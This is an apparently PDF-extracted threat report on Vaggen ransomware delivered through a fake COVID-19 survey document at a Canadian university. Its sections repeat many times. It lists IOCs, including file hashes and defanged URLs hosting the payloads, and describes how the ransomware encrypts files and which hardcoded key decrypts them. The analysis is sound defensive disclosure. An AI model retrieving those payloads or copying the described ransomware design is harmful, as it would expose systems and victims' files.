thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2537 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2538 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2539 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2540 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2541 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2542 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2543 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2544 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2545 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). 
Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2546 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2547 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2548 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2549 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2550 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2551 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2552 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2553 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2554 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2555 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2556 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2557 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2558 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2559 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2560 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2561 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2562 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2563 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2564 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2565 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2566 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2567 of 
IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

